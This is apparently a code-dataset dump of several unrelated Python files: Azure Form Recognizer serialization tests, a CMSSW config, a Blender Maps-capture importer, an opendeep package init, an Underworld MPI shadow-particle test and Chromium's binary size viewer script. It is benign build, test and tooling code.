{"x": 1527.0, "y": 1698.0},
{"x": 1427.0, "y": 1698.0},
],
"page_number": 1,
"field_elements": []
},
"name": "phone",
"value": "55554444",
"confidence": 0.99,
}
assert d == final
def test_recognized_form_to_dict(self):
form = _models.RecognizedForm(
form_type="test_form",
form_type_confidence="0.84",
model_id="examplemodel123",
page_range=_models.FormPageRange(1, 1),
fields={
"example": _models.FormField(
value_type="phoneNumber",
label_data=_models.FieldData(
text="phone",
page_number=1,
bounding_box=[
_models.Point(1427.0, 1669.0),
_models.Point(1527.0, 1669.0),
_models.Point(1527.0, 1698.0),
_models.Point(1427.0, 1698.0),
],
),
value_data=_models.FieldData(
text="55554444",
page_number=1,
bounding_box=[
_models.Point(1427.0, 1669.0),
_models.Point(1527.0, 1669.0),
_models.Point(1527.0, 1698.0),
_models.Point(1427.0, 1698.0),
],
),
name="phone",
value="55554444",
confidence=0.99,
)
},
pages=[_models.FormPage(
page_number=1,
text_angle=180.0,
width=5.5,
height=8.0,
unit="pixel",
lines=[_models.FormLine(
text="sample line",
bounding_box=[
_models.Point(1427.0, 1669.0),
_models.Point(1527.0, 1669.0),
_models.Point(1527.0, 1698.0),
_models.Point(1427.0, 1698.0),
],
words=[
_models.FormWord(
text="sample",
confidence=0.92,
page_number=1,
bounding_box=[
_models.Point(1427.0, 1669.0),
_models.Point(1527.0, 1669.0),
_models.Point(1527.0, 1698.0),
_models.Point(1427.0, 1698.0),
],
),
_models.FormWord(
text="line",
confidence=0.92,
page_number=1,
bounding_box=[
_models.Point(1427.0, 1669.0),
_models.Point(1527.0, 1669.0),
_models.Point(1527.0, 1698.0),
_models.Point(1427.0, 1698.0),
],
),
],
page_number=2,
appearance=_models.TextAppearance(
style_name="other", style_confidence=0.90
),
)],
)
]
)
d = form.to_dict()
final = {
"form_type": "test_form",
"form_type_confidence": "0.84",
"model_id": "examplemodel123",
"page_range": {"first_page_number": 1, "last_page_number": 1},
"fields": {
"example": {
"value_type": "phoneNumber",
"label_data": {
"text": "phone",
"bounding_box": [
{"x": 1427.0, "y": 1669.0},
{"x": 1527.0, "y": 1669.0},
{"x": 1527.0, "y": 1698.0},
{"x": 1427.0, "y": 1698.0},
],
"page_number": 1,
"field_elements": []
},
"value_data": {
"text": "55554444",
"bounding_box": [
{"x": 1427.0, "y": 1669.0},
{"x": 1527.0, "y": 1669.0},
{"x": 1527.0, "y": 1698.0},
{"x": 1427.0, "y": 1698.0},
],
"page_number": 1,
"field_elements": []
},
"name": "phone",
"value": "55554444",
"confidence": 0.99,
}
},
"pages": [{
"page_number": 1,
"text_angle": 180.0,
"width": 5.5,
"height": 8.0,
"unit": "pixel",
"lines": [{
"text": "sample line",
"bounding_box": [
{"x": 1427.0, "y": 1669.0},
{"x": 1527.0, "y": 1669.0},
{"x": 1527.0, "y": 1698.0},
{"x": 1427.0, "y": 1698.0},
],
"words": [
{
"text": "sample",
"bounding_box": [
{"x": 1427.0, "y": 1669.0},
{"x": 1527.0, "y": 1669.0},
{"x": 1527.0, "y": 1698.0},
{"x": 1427.0, "y": 1698.0},
],
"confidence": 0.92,
"page_number": 1,
"kind": "word",
},
{
"text": "line",
"bounding_box": [
{"x": 1427.0, "y": 1669.0},
{"x": 1527.0, "y": 1669.0},
{"x": 1527.0, "y": 1698.0},
{"x": 1427.0, "y": 1698.0},
],
"confidence": 0.92,
"page_number": 1,
"kind": "word",
},
],
"page_number": 2,
"kind": "line",
"appearance": {"style_name": "other", "style_confidence": 0.90},
}],
"selection_marks": [],
"tables": [],
}],
}
assert d == final
def test_form_page_to_dict(self):
form_page = _models.FormPage(
page_number=1,
text_angle=180.0,
width=5.5,
height=8.0,
unit="pixel",
tables= [
_models.FormTable(
page_number=2,
cells=[
_models.FormTableCell(
text="info",
row_index=1,
column_index=3,
row_span=1,
column_span=2,
bounding_box=[
_models.Point(1427.0, 1669.0),
_models.Point(1527.0, 1669.0),
_models.Point(1527.0, 1698.0),
_models.Point(1427.0, 1698.0),
],
confidence=0.87,
is_header=False,
is_footer=True,
page_number=1,
field_elements=[
_models.FormWord(
text="word",
confidence=0.92,
page_number=1,
bounding_box=[
_models.Point(1427.0, 1669.0),
_models.Point(1527.0, 1669.0),
_models.Point(1527.0, 1698.0),
_models.Point(1427.0, 1698.0),
],
),
]
)
],
row_count=10,
column_count=5,
bounding_box=[
_models.Point(1427.0, 1669.0),
_models.Point(1527.0, 1669.0),
_models.Point(1527.0, 1698.0),
_models.Point(1427.0, 1698.0),
],
),
],
lines=[_models.FormLine(
text="sample line",
bounding_box=[
_models.Point(1427.0, 1669.0),
_models.Point(1527.0, 1669.0),
_models.Point(1527.0, 1698.0),
_models.Point(1427.0, 1698.0),
],
words=[
_models.FormWord(
text="sample",
confidence=0.92,
page_number=1,
bounding_box=[
_models.Point(1427.0, 1669.0),
_models.Point(1527.0, 1669.0),
_models.Point(1527.0, 1698.0),
_models.Point(1427.0, 1698.0),
],
),
_models.FormWord(
text="line",
confidence=0.92,
page_number=1,
bounding_box=[
_models.Point(1427.0, 1669.0),
_models.Point(1527.0, 1669.0),
_models.Point(1527.0, 1698.0),
_models.Point(1427.0, 1698.0),
],
),
],
page_number=2,
appearance=_models.TextAppearance(
style_name="other", style_confidence=0.90
),
),
],
selection_marks=[_models.FormSelectionMark(
text="checkbox",
state="selected",
confidence=0.92,
page_number=1,
bounding_box=[
_models.Point(1427.0, 1669.0),
_models.Point(1527.0, 1669.0),
_models.Point(1527.0, 1698.0),
_models.Point(1427.0, 1698.0),
],
),
],
)
d = form_page.to_dict()
final = {
"page_number": 1,
"text_angle": 180.0,
"width": 5.5,
"height": 8.0,
"unit": "pixel",
"tables": [
{"cells": [
{
"text": "info",
"bounding_box": [
{"x": 1427.0, "y": 1669.0},
{"x": 1527.0, "y": 1669.0},
{"x": 1527.0, "y": 1698.0},
{"x": 1427.0, "y": 1698.0},
],
"row_index": 1,
"column_index": 3,
"row_span": 1,
"column_span": 2,
"confidence": 0.87,
"is_header": False,
"is_footer": True,
"page_number": 1,
"field_elements": [
{
"text": "word",
"bounding_box": [
{"x": 1427.0, "y": 1669.0},
{"x": 1527.0, "y": 1669.0},
{"x": 1527.0, "y": 1698.0},
{"x": 1427.0, "y": 1698.0},
],
"confidence": 0.92,
"page_number": 1,
"kind": "word",
}
],
},
],
"page_number": 2,
"row_count": 10,
"column_count": 5,
"bounding_box": [
{"x": 1427.0, "y": 1669.0},
{"x": 1527.0, "y": 1669.0},
{"x": 1527.0, "y": 1698.0},
{"x": 1427.0, "y": 1698.0},
],
},
],
"lines": [{
"text": "sample line",
"bounding_box": [
{"x": 1427.0, "y": 1669.0},
{"x": 1527.0, "y": 1669.0},
{"x": 1527.0, "y": 1698.0},
{"x": 1427.0, "y": 1698.0},
],
"words": [
{
"text": "sample",
"bounding_box": [
{"x": 1427.0, "y": 1669.0},
{"x": 1527.0, "y": 1669.0},
{"x": 1527.0, "y": 1698.0},
{"x": 1427.0, "y": 1698.0},
],
"confidence": 0.92,
"page_number": 1,
"kind": "word",
},
{
"text": "line",
"bounding_box": [
{"x": 1427.0, "y": 1669.0},
{"x": 1527.0, "y": 1669.0},
{"x": 1527.0, "y": 1698.0},
{"x": 1427.0, "y": 1698.0},
],
"confidence": 0.92,
"page_number": 1,
"kind": "word",
},
],
"page_number": 2,
"kind": "line",
"appearance": {"style_name": "other", "style_confidence": 0.90},
}],
"selection_marks": [{
"text": "checkbox",
"state": "selected",
"bounding_box": [
{"x": 1427.0, "y": 1669.0},
{"x": 1527.0, "y": 1669.0},
{"x": 1527.0, "y": 1698.0},
{"x": 1427.0, "y": 1698.0},
],
"confidence": 0.92,
"page_number": 1,
"kind": "selectionMark",
}],
}
assert d == final
def test_form_table_cell_to_dict(self):
table_cell = _models.FormTableCell(
text="info",
row_index=1,
column_index=3,
row_span=1,
column_span=2,
bounding_box=[
_models.Point(1427.0, 1669.0),
_models.Point(1527.0, 1669.0),
_models.Point(1527.0, 1698.0),
_models.Point(1427.0, 1698.0),
],
confidence=0.87,
is_header=False,
is_footer=True,
page_number=1,
field_elements=[
_models.FormWord(
text="word",
confidence=0.92,
page_number=1,
bounding_box=[
_models.Point(1427.0, 1669.0),
_models.Point(1527.0, 1669.0),
_models.Point(1527.0, 1698.0),
_models.Point(1427.0, 1698.0),
],
),
]
)
d = table_cell.to_dict()
final = {
"text": "info",
"bounding_box": [
{"x": 1427.0, "y": 1669.0},
{"x": 1527.0, "y": 1669.0},
{"x": 1527.0, "y": 1698.0},
{"x": 1427.0, "y": 1698.0},
],
"row_index": 1,
"column_index": 3,
"row_span": 1,
"column_span": 2,
"confidence": 0.87,
"is_header": False,
"is_footer": True,
"page_number": 1,
"field_elements": [
{
"text": "word",
"bounding_box": [
{"x": 1427.0, "y": 1669.0},
{"x": 1527.0, "y": 1669.0},
{"x": 1527.0, "y": 1698.0},
{"x": 1427.0, "y": 1698.0},
],
"confidence": 0.92,
"page_number": 1,
"kind": "word",
}
],
}
assert d == final
def test_form_table_to_dict(self):
table = _models.FormTable(
page_number=2,
cells=[
_models.FormTableCell(
text="info",
row_index=1,
column_index=3,
row_span=1,
column_span=2,
bounding_box=[
_models.Point(1427.0, 1669.0),
_models.Point(1527.0, 1669.0),
_models.Point(1527.0, 1698.0),
_models.Point(1427.0, 1698.0),
],
confidence=0.87,
is_header=False,
is_footer=True,
page_number=1,
field_elements=[
_models.FormWord(
text="word",
confidence=0.92,
page_number=1,
bounding_box=[
_models.Point(1427.0, 1669.0),
_models.Point(1527.0, 1669.0),
_models.Point(1527.0, 1698.0),
_models.Point(1427.0, 1698.0),
],
),
]
)
],
row_count=10,
column_count=5,
bounding_box=[
_models.Point(1427.0, 1669.0),
_models.Point(1527.0, 1669.0),
_models.Point(1527.0, 1698.0),
_models.Point(1427.0, 1698.0),
],
)
d = table.to_dict()
final = {
"cells": [
{
"text": "info",
"bounding_box": [
{"x": 1427.0, "y": 1669.0},
{"x": 1527.0, "y": 1669.0},
{"x": 1527.0, "y": 1698.0},
{"x": 1427.0, "y": 1698.0},
],
"row_index": 1,
"column_index": 3,
"row_span": 1,
"column_span": 2,
"confidence": 0.87,
"is_header": False,
"is_footer": True,
"page_number": 1,
"field_elements": [
{
"text": "word",
"bounding_box": [
{"x": 1427.0, "y": 1669.0},
{"x": 1527.0, "y": 1669.0},
{"x": 1527.0, "y": 1698.0},
{"x": 1427.0, "y": 1698.0},
],
"confidence": 0.92,
"page_number": 1,
"kind": "word",
}
],
},
],
"page_number": 2,
"row_count": 10,
"column_count": 5,
"bounding_box": [
{"x": 1427.0, "y": 1669.0},
{"x": 1527.0, "y": 1669.0},
{"x": 1527.0, "y": 1698.0},
{"x": 1427.0, "y": 1698.0},
],
}
assert d == final
def test_custom_form_model_properties_to_dict(self):
model = _models.CustomFormModelProperties(
is_composed_model=True,
)
d = model.to_dict()
final = {
"is_composed_model": True,
}
assert d == final
def test_account_properties_to_dict(self):
model = _models.AccountProperties(
custom_model_count=5,
custom_model_limit=10,
)
d = model.to_dict()
final = {
"custom_model_count": 5,
"custom_model_limit": 10,
}
assert d == final
def test_custom_form_model_info_to_dict(self):
model = _models.CustomFormModelInfo(
model_id="1234",
status="creating",
training_started_on=datetime(2021, 1, 10, 23, 55, 59, 342380),
training_completed_on=datetime(2021, 1, 10, 23, 55, 59, 342380),
model_name="sample_model",
properties=_models.CustomFormModelProperties(
is_composed_model=False,
)
)
d = model.to_dict()
final = {
"model_id": "1234",
"status": "creating",
"training_started_on": datetime(2021, 1, 10, 23, 55, 59, 342380),
"training_completed_on": datetime(2021, 1, 10, 23, 55, 59, 342380),
"model_name": "sample_model",
"properties": {
"is_composed_model": False,
}
}
assert d == final
def test_form_recognizer_error_to_dict(self):
model = _models.FormRecognizerError(
code=404,
message="error not found",
)
d = model.to_dict()
final = {
"code": 404,
"message": "error not found",
}
assert d == final
def test_training_document_info_to_dict(self):
model = _models.TrainingDocumentInfo(
name="sample doc",
status="succeeded",
page_count=3,
errors=[
_models.FormRecognizerError(
code=404,
message="error not found",
)
],
model_id="1234",
)
d = model.to_dict()
final = {
"name": "sample doc",
"status": "succeeded",
"page_count": 3,
"errors": [
{
"code": 404,
"message": "error not found",
}
],
"model_id": "1234",
}
assert d == final
def test_custom_form_model_field_to_dict(self):
model = _models.CustomFormModelField(
label="field_label",
name="field",
accuracy=0.98,
)
d = model.to_dict()
final = {
"label": "field_label",
"name": "field",
"accuracy": 0.98,
}
assert d == final
def test_custom_form_submodel_to_dict(self):
model = _models.CustomFormSubmodel(
model_id="1234",
form_type="submodel",
accuracy=0.98,
fields={
"example": _models.CustomFormModelField(
label="field_label",
name="field",
accuracy=0.98,
)
}
)
d = model.to_dict()
final = {
"model_id": "1234",
"form_type": "submodel",
"accuracy": 0.98,
"fields": {
"example": {
"label": "field_label",
"name": "field",
"accuracy": 0.98,
}
}
}
assert d == final
def test_custom_form_model_to_dict(self):
model = _models.CustomFormModel(
model_id="1234",
status="ready",
training_started_on=datetime(2021, 1, 10, 23, 55, 59, 342380),
training_completed_on=datetime(2021, 1, 10, 23, 55, 59, 342380),
submodels=[
_models.CustomFormSubmodel(
model_id="1234",
form_type="submodel",
accuracy=0.98,
fields={
"example": _models.CustomFormModelField(
label="field_label",
name="field",
accuracy=0.98,
)
}
)
],
errors=[
_models.FormRecognizerError(
code=404,
message="error not found",
)
],
training_documents=[
_models.TrainingDocumentInfo(
name="sample doc",
status="succeeded",
page_count=3,
errors=[
_models.FormRecognizerError(
code=404,
message="error not found",
)
],
model_id="1234",
)
],
model_name="sample model",
properties=_models.CustomFormModelProperties(
is_composed_model=True,
)
)
d = model.to_dict()
final = {
"model_id": "1234",
"status": "ready",
"training_started_on": datetime(2021, 1, 10, 23, 55, 59, 342380),
"training_completed_on": datetime(2021, 1, 10, 23, 55, 59, 342380),
"submodels": [{
"model_id": "1234",
"form_type": "submodel",
"accuracy": 0.98,
"fields": {
"example":
{
"label": "field_label",
"name": "field",
"accuracy": 0.98,
}
}
}],
"errors": [
{
"code": 404,
"message": "error not found",
}
],
"training_documents": [
{
"name": "sample doc",
"status": "succeeded",
"page_count": 3,
"errors": [
{
"code": 404,
"message": "error not found",
}
],
"model_id": "1234",
}
],
"model_name": "sample model",
"properties": {
"is_composed_model": True,
}
}
assert d == final
|
Validation/HGCalValidation/python/HFNoseDigiClient_cfi.py | ckamtsikis/cmssw | 852 | 12635943 | <reponame>ckamtsikis/cmssw<filename>Validation/HGCalValidation/python/HFNoseDigiClient_cfi.py
import FWCore.ParameterSet.Config as cms
from Validation.HGCalValidation.HGCalDigiClient_cfi import *
hfnoseDigiClient = hgcalDigiClientEE.clone(
DetectorName = cms.string("HGCalHFNoseSensitive"))
|
blender/MapsModelsImporter/operators.py | r23/MapsModelsImporter | 1,401 | 12635948 | # Copyright (c) 2019 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the “Software”), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# The Software is provided “as is”, without warranty of any kind, express or
# implied, including but not limited to the warranties of merchantability,
# fitness for a particular purpose and noninfringement. In no event shall
# the authors or copyright holders be liable for any claim, damages or other
# liability, whether in an action of contract, tort or otherwise, arising from,
# out of or in connection with the software or the use or other dealings in the
# Software.
#
# This file is part of MapsModelsImporter, a set of addons to import 3D models
# from Maps services
import bpy
from bpy_extras.io_utils import ImportHelper
from bpy.props import StringProperty, IntProperty
from bpy.types import Operator
from .google_maps import importCapture, MapsModelsImportError
from .preferences import getPreferences
class IMP_OP_GoogleMapsCapture(Operator, ImportHelper):
"""Import a capture of a Google Maps frame recorded with RenderDoc"""
bl_idname = "import_rdc.google_maps"
bl_label = "Import Google Maps Capture"
filename_ext = ".rdc"
filter_glob: StringProperty(
default="*.rdc",
options={'HIDDEN'},
maxlen=1024, # Max internal buffer length, longer would be clamped.
)
max_blocks: IntProperty(
name="Max Blocks",
description="Maximum number of draw calls to load",
default=-1,
)
def execute(self, context):
pref = getPreferences(context)
try:
importCapture(context, self.filepath, self.max_blocks, pref)
error = None
except MapsModelsImportError as err:
error = err.args[0]
if error is not None:
self.report({'ERROR'}, error)
return {'FINISHED'}
def menu_func_import(self, context):
self.layout.operator(IMP_OP_GoogleMapsCapture.bl_idname, text="Google Maps Capture (.rdc)")
def register():
bpy.utils.register_class(IMP_OP_GoogleMapsCapture)
bpy.types.TOPBAR_MT_file_import.append(menu_func_import)
def unregister():
bpy.utils.unregister_class(IMP_OP_GoogleMapsCapture)
bpy.types.TOPBAR_MT_file_import.remove(menu_func_import)
|
opendeep/optimization/loss/__init__.py | vitruvianscience/OpenDeep | 252 | 12635966 | <filename>opendeep/optimization/loss/__init__.py
from __future__ import division, absolute_import, print_function
from opendeep.optimization.loss.loss import *
from opendeep.optimization.loss.binary_crossentropy import *
from opendeep.optimization.loss.categorical_crossentropy import *
from opendeep.optimization.loss.isotropic_gaussian_LL import *
from opendeep.optimization.loss.mse import *
from opendeep.optimization.loss.neg_LL import *
from opendeep.optimization.loss.zero_one import *
from opendeep.optimization.loss import utils
|
docs/test/shadow_particle_test.py | longgangfan/underworld2 | 116 | 12635997 | import h5py
if h5py.get_config().mpi == False:
import warnings
warnings.warn("h5py not MPI enabled. Discontinuing test.")
import sys
sys.exit(0)
import underworld as uw
import numpy as np
mesh = uw.mesh.FeMesh_Cartesian(elementRes=(128,128))
swarm = uw.swarm.Swarm(mesh)
# create some variables to track
origOwningEl = swarm.add_variable('int',1)
origCreatingProc = swarm.add_variable('int',1)
origParticleIndex = swarm.add_variable('int',1)
randomNumber = swarm.add_variable('int',1)
swarm.populate_using_layout(uw.swarm.layouts.PerCellSpaceFillerLayout(swarm,20))
# init variables
origOwningEl.data[:] = mesh.data_elgId[swarm.owningCell.data[:]] # global elementId where created
origCreatingProc.data[:] = uw.mpi.rank # rank where created
origParticleIndex.data[:,0] = range(swarm.particleLocalCount) # local index where created
from random import randint
for index in range(0,swarm.particleLocalCount): # add random numbers to this variable
randomNumber.data[index] = randint(0,9999999)
# get max local particlecount across all procs
from mpi4py import MPI
import numpy as np
comm = MPI.COMM_WORLD
inguy = np.zeros(1)
outguy = np.zeros(1)
inguy[:] = swarm.particleLocalCount
comm.Allreduce(inguy, outguy, op=MPI.MAX)
# create h5 array for players to write primary data into
f = h5py.File('primarydata.hdf5', 'w', driver='mpio', comm=MPI.COMM_WORLD)
dset_data = f.create_dataset('randomdata', (comm.Get_size(),outguy[0]), dtype='i')
# write primary data parallel array
dset_data[uw.mpi.rank,origParticleIndex.data[:,0]] = randomNumber.data[:,0]
# also create one to write particle element counts
dset_counts = f.create_dataset('counts', (mesh.elementsGlobal,), dtype='i')
# get counts
el_index, counts = np.unique(origOwningEl.data[:,0],return_counts=True)
for element_gId, el_count in zip (el_index,counts):
dset_counts[element_gId] = el_count
if len(origCreatingProc.data_shadow) != 0:
raise RuntimeError("The shadow data should be empty at this stage, but isn't. Hmm...")
# get shadow particles!!
swarm.shadow_particles_fetch()
if len(origCreatingProc.data_shadow) == 0 and (uw.mpi.size>1):
raise RuntimeError("The shadow data should be populated at this stage, but isn't. Hmm...")
# now check that communicated particles contain required data.
# first create local numpy copies of primary data in memory,
# as h5py has limitations in the way you can index its arrays
dset_numpy_data = np.array(dset_data)
if not (dset_numpy_data[origCreatingProc.data_shadow[:,0], origParticleIndex.data_shadow[:,0]] == randomNumber.data_shadow[:,0]).all():
raise RuntimeError("Shadow particle data does not appear to be correct.")
# also check that we have the correct particle counts
# get counts
el_index, counts = np.unique(origOwningEl.data_shadow[:,0],return_counts=True)
# again create copy for indexing ease
dset_numpy_counts = np.array(dset_counts)
if not (dset_numpy_counts[el_index] == counts[:]).all():
raise RuntimeError("Shadow data particle counts do not appear to be correct.")
# close and cleaup
f.close()
import os
if uw.mpi.rank==0:
os.remove('primarydata.hdf5')
|
tools/win/sizeviewer/sizeviewer.py | zealoussnow/chromium | 14,668 | 12636002 | # Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from __future__ import print_function
import base64
import codecs
import json
import os
import string
import subprocess
import sys
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
def Run(*args):
p = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out, err = p.communicate()
if p.returncode != 0:
raise SystemExit(out)
def FindNode(node, component):
for child in node['children']:
if child['name'] == component:
return child
return None
def InsertIntoTree(tree, source_name, size):
components = source_name[3:].split('\\')
node = tree
for index, component in enumerate(components):
data = FindNode(node, component)
if not data:
data = { 'name': source_name, 'name': component }
if index == len(components) - 1:
data['size'] = size
else:
data['children'] = []
node['children'].append(data)
node = data
def FlattenTree(tree):
result = [['Path', 'Parent', 'Size', 'Value']]
def Flatten(node, parent):
name = node['name']
if parent and parent != '/':
name = parent + '/' + name
if 'children' in node:
result.append([name, parent, -1, -1])
for c in node['children']:
Flatten(c, name)
else:
result.append([name, parent, node['size'], node['size']])
Flatten(tree, '')
return result
def GetAsset(filename):
with open(os.path.join(BASE_DIR, filename), 'rb') as f:
return f.read()
def AppendAsScriptBlock(f, value, var=None):
f.write('<script type="text/javascript">\n')
if var:
f.write('var ' + var + ' = ')
f.write(value)
if var:
f.write(';\n')
f.write('</script>\n')
def main():
jsons = []
if len(sys.argv) > 1:
dlls = sys.argv[1:]
else:
out_dir = os.path.join(BASE_DIR, '..', '..', '..', 'out', 'Release')
dlls = [os.path.normpath(os.path.join(out_dir, dll))
for dll in ('chrome.dll', 'chrome_child.dll')]
for dll_path in dlls:
if os.path.exists(dll_path):
print('Tallying %s...' % dll_path)
json_path = dll_path + '.json'
Run(os.path.join(BASE_DIR, '..', '..', '..', 'third_party', 'syzygy',
'binaries', 'exe', 'experimental', 'code_tally.exe'),
'--input-image=' + dll_path,
'--input-pdb=' + dll_path + '.pdb',
'--output-file=' + json_path)
jsons.append(json_path)
if not jsons:
print('Couldn\'t find dlls.')
print(
'Pass fully qualified dll name(s) if you want to use something other ')
print('than out\\Release\\chrome.dll and chrome_child.dll.')
return 1
# Munge the code_tally json format into an easier-to-view format.
for json_name in jsons:
with open(json_name, 'r') as jsonf:
all_data = json.load(jsonf)
html_path = os.path.splitext(json_name)[0] + '.html'
print('Generating %s... (standlone)' % html_path)
by_source = {}
symbols_index = {}
symbols = []
for obj_name, obj_data in all_data['objects'].iteritems():
for symbol, symbol_data in obj_data.iteritems():
size = int(symbol_data['size'])
# Sometimes there's symbols with no source file, we just ignore those.
if 'contribs' in symbol_data:
i = 0
while i < len(symbol_data['contribs']):
src_index = symbol_data['contribs'][i]
i += 1
per_line = symbol_data['contribs'][i]
i += 1
source = all_data['sources'][int(src_index)]
if source not in by_source:
by_source[source] = {'lines': {}, 'total_size': 0}
size = 0
# per_line is [line, size, line, size, line, size, ...]
for j in range(0, len(per_line), 2):
line_number = per_line[j]
size += per_line[j + 1]
# Save some time/space in JS by using an array here. 0 == size,
# 1 == symbol list.
by_source[source]['lines'].setdefault(line_number, [0, []])
by_source[source]['lines'][line_number][0] += per_line[j + 1]
if symbol in symbols_index:
symindex = symbols_index[symbol]
else:
symbols.append(symbol)
symbols_index[symbol] = symindex = len(symbols) - 1
by_source[source]['lines'][line_number][1].append(
symindex)
by_source[source]['total_size'] += size
binary_name = all_data['executable']['name']
data = {}
data['name'] = '/'
data['children'] = []
file_contents = {}
line_data = {}
for source, file_data in by_source.iteritems():
InsertIntoTree(data, source, file_data['total_size'])
store_as = source[3:].replace('\\', '/')
try:
with codecs.open(source, 'rb', encoding='latin1') as f:
file_contents[store_as] = f.read()
except IOError:
file_contents[store_as] = '// Unable to load source.'
line_data[store_as] = file_data['lines']
# code_tally attempts to assign fractional bytes when code is shared
# across multiple symbols. Round off here for display after summing above.
for per_line in line_data[store_as].values():
per_line[0] = round(per_line[0])
flattened = FlattenTree(data)
maxval = 0
for i in flattened[1:]:
maxval = max(i[2], maxval)
flattened_str = json.dumps(flattened)
to_write = GetAsset('template.html')
# Save all data and what would normally be external resources into the
# one html so that it's a standalone report.
with open(html_path, 'w') as f:
f.write(to_write)
# These aren't subbed in as a silly workaround for 32-bit python.
# The end result is only ~100M, but while substituting these into a
# template, it otherwise raises a MemoryError, I guess due to
# fragmentation. So instead, we just append them as variables to the file
# and then refer to the variables in the main script.
filedata_str = json.dumps(file_contents).replace(
'</script>', '</scr"+"ipt>')
AppendAsScriptBlock(f, filedata_str, var='g_file_contents')
AppendAsScriptBlock(f, json.dumps(line_data), var='g_line_data')
AppendAsScriptBlock(f, json.dumps(symbols), var='g_symbol_list')
favicon_str = json.dumps(base64.b64encode(GetAsset('favicon.png')))
AppendAsScriptBlock(f, favicon_str, var='g_favicon')
AppendAsScriptBlock(f, flattened_str, var='g_raw_data')
AppendAsScriptBlock(f, str(maxval), var='g_maxval')
dllname_str = binary_name + ' ' + all_data['executable']['version']
AppendAsScriptBlock(f, json.dumps(dllname_str), var='g_dllname')
AppendAsScriptBlock(f, GetAsset('codemirror.js'))
AppendAsScriptBlock(f, GetAsset('clike.js'))
AppendAsScriptBlock(f, GetAsset('main.js'))
f.write('</html>')
return 0
if __name__ == '__main__':
sys.exit(main())
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.